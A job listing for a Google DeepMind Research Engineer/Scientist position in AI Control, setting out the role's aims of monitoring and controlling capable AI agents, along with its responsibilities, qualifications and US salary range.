Related jobs

Google DeepMind›Research Engineer›

Research Engineer
Mountain View

›

Google DeepMind · Mountain View

Research Engineer/Scientist, AI Control

11/4/2025

Description

Agents are increasingly used to handle long-horizon tasks. We already see this in coding, where advances are moving us from simple code autocomplete to advanced AI systems that write code, build, test, and debug all on their own. As we get closer to AGI, we need guarantees that help control and guide these agents, especially in scenarios where the agent’s capabilities may exceed those of the systems tasked with monitoring it. You will:

Go beyond traditional security assumptions to model how a highly capable agent could misuse its access, exfiltrate data, or establish a rogue deployment within complex production environments.
Develop techniques for monitoring advanced agents. How can we detect emergent deception, collusion, or obscured long-term plans before they result in harmful actions?
Create novel evaluation methodologies and benchmarks to measure the effectiveness of different control strategies against highly capable simulated adversaries.

Key responsibilities:

Identify and formalize unsolved research problems in AI control, focusing on the unique challenges posed by agents that may exceed human oversight capabilities.
Design, prototype, and evaluate novel control systems and monitoring techniques. This includes theoretical work, large-scale experiments, and building proof-of-concept systems.
Collaborate closely with teams working on Gemini and agent infrastructure to understand emergent risks and integrate control mechanisms directly into the systems where they are most needed.
Publish groundbreaking research and contribute to the broader academic and policy conversation on long-term AI safety and control.

Qualifications

Ph.D. in Computer Science or related quantitative field, or B.S./M.S. in Computer Science or related quantitative field with 5+ years of relevant experience.
Demonstrated research or product expertise in AI safety, AI alignment, or a related security field.

Experience with adversarial research, red-teaming, or vulnerability research, particularly in complex software or AI/ML systems.
Strong software engineering skills and experience with ML frameworks like JAX, PyTorch, or TensorFlow.
Familiarity with concepts from game theory or mechanism design problems as they apply to AI.
A track record of landing research impact within multi-team collaborative environments.

Benefits

The US base salary range for this full-time position is between $166,000 - $244,000 + bonus + equity + benefits. Your recruiter can share more about the specific salary range for your targeted location during the hiring process.

Application

View listing at origin and apply!

Related jobs

Google DeepMind›Research Engineer›

Research Engineer
Mountain View

›

About

Related jobs

Research Engineer/Scientist, AI Control

Description

Key responsibilities:

Qualifications

Benefits

Application

Related jobs